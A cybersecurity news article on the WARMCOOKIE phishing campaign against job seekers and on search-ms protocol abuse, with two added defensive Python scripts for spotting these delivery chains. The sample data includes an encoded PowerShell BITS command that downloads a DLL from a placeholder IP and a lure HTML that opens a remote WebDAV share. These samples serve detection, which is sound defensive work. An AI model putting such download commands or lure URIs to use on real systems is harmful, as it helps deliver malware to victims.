Cyber security news for all


    New Phishing Campaign Deploys WARMCOOKIE Backdoor Targeting Job Seekers

    Cybersecurity researchers have detailed an active phishing campaign that uses job-seeking lures to deliver a Windows backdoor dubbed WARMCOOKIE.

    “WARMCOOKIE appears to be a preliminary reconnaissance tool employed to infiltrate victim networks and deploy further malicious payloads,” Elastic Security Labs researcher Daniel Stepanic said in his latest analysis. “Each variant is imbued with a hard-coded command-and-control IP address and RC4 encryption key.”

    The backdoor can fingerprint infected machines, capture screenshots, and drop additional payloads. Elastic tracks the campaign as REF6127.

    Attack chains observed since late April begin with emails impersonating recruitment firms such as Hays, Michael Page, and PageGroup, urging recipients to click an embedded link to view a supposed job opportunity.

    Clicking the link leads to a page that asks the user to solve a CAPTCHA before downloading a document. What is actually downloaded is a JavaScript file (“Update_23_04_2024_5689382.js”).

    “This obfuscated script executes PowerShell, initiating the process to deploy WARMCOOKIE,” stated Elastic. “The PowerShell script exploits the Background Intelligent Transfer Service (BITS) to download WARMCOOKIE.”
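The delivery chain described above (script host, then PowerShell, then a BITS transfer) leaves a distinctive parent/child trail in process telemetry. The following hunt is an added example, not code from Elastic or from the campaign: it walks constructed process-creation records shaped like Sysmon Event ID 1 or EDR data, decodes any `-EncodedCommand` payload so the BITS call is visible, and reports PowerShell instances that were spawned by wscript.exe or cscript.exe and drive BITS. The field names, file paths and the 203.0.113.10 address are assumptions, not campaign indicators.

```python
"""Hunt for the script-host -> PowerShell -> BITS delivery chain.

Added example, not code from Elastic or the campaign. The event records are
constructed to resemble Sysmon Event ID 1 / EDR process-creation telemetry;
the field names, paths and the 203.0.113.10 address are assumptions.
"""
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    ppid: int
    image: str      # executable basename, e.g. "powershell.exe"
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# The usual ways a script drives BITS: the cmdlet, the legacy CLI, or COM.
BITS_RE = re.compile(
    r"start-bitstransfer|bitsadmin(?:\.exe)?\s+/transfer|Microsoft\.BITS",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand carry a base64 UTF-16LE script;
# the match must run over the decoded text or the BITS call stays hidden.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def effective_cmdline(cmdline: str) -> str:
    """Return the command line with any -EncodedCommand payload decoded in place."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline          # not valid base64/UTF-16LE: leave untouched
    return cmdline[: m.start()] + decoded + cmdline[m.end():]


def find_bits_chains(events):
    """Return (script_host, powershell) pairs where wscript/cscript launched
    PowerShell that in turn drives BITS, the sequence seen in the lure."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image.lower() not in POWERSHELL:
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or parent.image.lower() not in SCRIPT_HOSTS:
            continue
        if BITS_RE.search(effective_cmdline(e.cmdline)):
            hits.append((parent, e))
    return hits


# Constructed telemetry: one lure chain plus two benign look-alikes.
_STAGE2 = "Start-BitsTransfer -Source 'http://203.0.113.10/f' -Destination 'C:\\ProgramData\\up.dll'"
_ENCODED = base64.b64encode(_STAGE2.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcessEvent(1200, 900, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcessEvent(4104, 1200, "wscript.exe",
                 'wscript.exe "C:\\Users\\u\\Downloads\\Update_23_04_2024_5689382.js"'),
    ProcessEvent(4120, 4104, "powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {_ENCODED}"),
    # Benign: an admin console using BITS; the parent is not a script host.
    ProcessEvent(5000, 1200, "powershell.exe",
                 "powershell.exe Start-BitsTransfer -Source https://intranet.example/pkg.msi -Destination C:\\Temp"),
    # Benign: a script host launching PowerShell that never touches BITS.
    ProcessEvent(5100, 4104, "powershell.exe", "powershell.exe -File C:\\Scripts\\inventory.ps1"),
]

if __name__ == "__main__":
    for parent, child in find_bits_chains(SAMPLE_EVENTS):
        print(f"[!] {parent.image} (pid {parent.pid}) -> {child.image} (pid {child.pid})")
        print("    decoded:", effective_cmdline(child.cmdline))
```

Only the wscript-spawned PowerShell with the decoded `Start-BitsTransfer` call is reported; the admin console using BITS and the script-host child that never touches BITS are left alone. In production the same logic belongs in a SIEM rule keyed on parent image, and the BITS-Client operational log (job creation events carrying the remote URL) gives a second, independent signal for the download itself.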

    A notable aspect of the campaign is its use of compromised infrastructure to host the initial phishing URL, which then redirects victims to the landing page.

    WARMCOOKIE is a Windows DLL that runs in two stages: the first establishes persistence through a scheduled task, and the second launches the core backdoor functionality, with anti-analysis checks along the way to evade detection.

    The backdoor gathers host information in a way that resembles an artifact linked to an earlier campaign, codenamed Resident, which targeted the manufacturing, commercial, and healthcare sectors.

    Additionally, it supports commands to read and write files, execute commands via cmd.exe, retrieve a list of installed applications, and capture screenshots.

    “WARMCOOKIE is an emerging backdoor gaining traction, used in campaigns targeting users globally,” Elastic reported.

    The disclosure coincides with a Trustwave SpiderLabs report on a phishing campaign that uses invoice-themed lures and abuses the Windows search protocol from within HTML attachments to deliver malware.

    “The functionality offered is relatively straightforward, enabling threat actors to monitor victims and deploy more harmful payloads, such as ransomware,” the analysis noted.

    The emails carry a ZIP archive containing an HTML file that abuses the Windows “search:” URI protocol handler to display, inside Windows Explorer, a shortcut (LNK) file hosted on a remote server, so that it looks like a local search result.

    “This LNK file links to a batch script (BAT) hosted on the same server, which, when clicked by the user, could trigger additional malicious operations,” Trustwave explained, noting that the batch script could not be retrieved due to an unresponsive server.

    Abuse of the search-ms: and search: protocol handlers as a malware distribution vector was documented by Trellix in July 2023.

    “Although this attack doesn’t automate malware installation, it requires user interaction with various prompts and clicks,” the company stated. “This technique cleverly obscures the attacker’s true intentions, exploiting the trust users place in familiar interfaces and common actions like opening email attachments.”
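The trick in the HTML lure is a `search:` or `search-ms:` URI whose `crumb=location:` parameter points Explorer at a remote share, while `displayname` labels the window as something familiar. The scanner below is an added example, not Trustwave's or Trellix's code: it pulls every such URI out of an HTML attachment, parses its parameters, and flags a crumb location that is a UNC path (and, where the host is written as `host@80` or `host@SSL@443`, notes that Windows will fetch it over WebDAV, which is how a plain web server can serve the LNK). The sample HTML, the 203.0.113.10 host, the share path and the display name are constructed stand-ins, not indicators from the campaign.

```python
"""Flag search:/search-ms: protocol URIs in HTML attachments.

Added example, not Trustwave's or Trellix's code. The HTML below is
constructed; the 203.0.113.10 host, share path and display name are
assumptions standing in for whatever a real lure would carry.
"""
import html
import re
from urllib.parse import parse_qs

# The scheme is followed by &-separated key=value parameters, e.g.
# search-ms:query=...&crumb=location:\\host\share&displayname=...
SEARCH_URI_RE = re.compile(r"\b(search(?:-ms)?):([^\s\"'<>]+)", re.IGNORECASE)


def classify_location(location: str):
    """Split a crumb location into (is_remote, host, is_webdav).

    A UNC path pulls results from another machine; a host written as
    host@80 or host@SSL@443 makes Windows use WebDAV, so an attacker can
    serve the LNK from an ordinary web server.
    """
    if not location.startswith("\\\\"):
        return False, None, False
    host_part = location[2:].split("\\", 1)[0]
    webdav = "@" in host_part
    return True, host_part.split("@", 1)[0], webdav


def scan_html(doc: str):
    """Return one finding per search URI found in the document."""
    findings = []
    for m in SEARCH_URI_RE.finditer(html.unescape(doc)):
        scheme, params = m.group(1).lower(), m.group(2)
        fields = parse_qs(params, keep_blank_values=True)
        # A URI may carry several crumbs; only the location crumb matters here.
        location = next(
            (c[len("location:"):] for c in fields.get("crumb", [])
             if c.lower().startswith("location:")),
            "",
        )
        remote, host, webdav = classify_location(location)
        findings.append({
            "scheme": scheme,
            "query": fields.get("query", [""])[0],
            "displayname": fields.get("displayname", [""])[0],
            "location": location,
            "remote": remote,
            "host": host,
            "webdav": webdav,
        })
    return findings


# Constructed lure: a meta refresh opens a remote WebDAV "search" dressed up
# as the Downloads folder; the anchor is a harmless local search for contrast.
SAMPLE_HTML = r'''<!doctype html>
<html><head>
<meta http-equiv="refresh" content="0; url=search-ms:query=Invoice&amp;crumb=location:\\203.0.113.10@80\DavWWWRoot\inv&amp;displayname=Downloads">
</head><body>
<p>If nothing opens, <a href="search:query=Report&crumb=location:C:\Users\Public&displayname=Public">click here</a>.</p>
</body></html>'''

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        flag = "[!]" if f["remote"] else "[ ]"
        print(flag, f["scheme"], "->", f["location"], "shown as", repr(f["displayname"]))
```

Any finding with `remote` set is worth quarantining at the mail gateway regardless of what the display name says. On the endpoint side, a widely cited hardening step since the Trellix write-up is to remove or rename the `search-ms` and `search` protocol handler keys under `HKEY_CLASSES_ROOT`, at the cost of breaking legitimate links of that kind.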
